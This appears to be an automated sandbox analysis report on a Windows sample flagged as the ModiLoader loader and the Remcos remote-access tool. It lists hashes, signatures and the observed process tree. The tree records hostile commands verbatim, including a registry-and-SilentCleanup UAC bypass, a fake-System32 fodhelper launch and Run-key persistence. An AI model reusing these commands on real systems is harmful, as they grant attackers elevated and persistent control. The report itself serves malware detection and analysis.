Analysis

  • max time kernel
    146s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    08/07/2020, 10:06

General

  • Target

    de2ebb27023e08b71d091c7695c59192.exe

  • Size

    649KB

  • MD5

    de2ebb27023e08b71d091c7695c59192

  • SHA1

    6b5d2d11a1b712b38d6d699612cdd66fcc755db8

  • SHA256

    e67dd040ce53fbf4e0ef2121dabd060c5c764ede3eec55801376b144a0f40419

  • SHA512

    39c16d7f3672c6ee3c848e898a56b678bc7127ed1af0984a726a4557d8cd73ee96cdea1aa97f79e92680acfed7f666fd35e9f456acf15a54308cbc0eedc99071

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Modifies registry key 1 TTPs 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 537 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\de2ebb27023e08b71d091c7695c59192.exe
    "C:\Users\Admin\AppData\Local\Temp\de2ebb27023e08b71d091c7695c59192.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:1388
    • C:\Windows\SysWOW64\TapiUnattend.exe
      "C:\Windows\System32\TapiUnattend.exe"
      2⤵
      PID:1328
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c C:\Users\Public\Natso.bat
        3⤵
        PID:1816
        • C:\Windows\SysWOW64\reg.exe
          reg delete hkcu\Environment /v windir /f
          4⤵
          • Modifies registry key
          PID:1556
        • C:\Windows\SysWOW64\reg.exe
          reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
          4⤵
          • Modifies registry key
          PID:1044
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
          4⤵
          PID:736
        • C:\Windows\SysWOW64\reg.exe
          reg delete hkcu\Environment /v windir /f
          4⤵
          • Modifies registry key
          PID:1452
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c C:\Users\Public\Runex.bat
        3⤵
        PID:1528
        • C:\Windows \System32\fodhelper.exe
          "C:\Windows \System32\fodhelper.exe"
          4⤵
          • Executes dropped EXE
          PID:1644
        • C:\Windows \System32\fodhelper.exe
          "C:\Windows \System32\fodhelper.exe"
          4⤵
          • Executes dropped EXE
          PID:1196
    • C:\Program Files (x86)\internet explorer\ieinstal.exe
      "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      PID:1072

Network

MITRE ATT&CK Enterprise v6

Downloads

  • memory/1388-130-0x0000000010530000-0x0000000010554000-memory.dmp

    Filesize

    144KB

  • memory/1388-124-0x0000000010410000-0x0000000010450000-memory.dmp

    Filesize

    256KB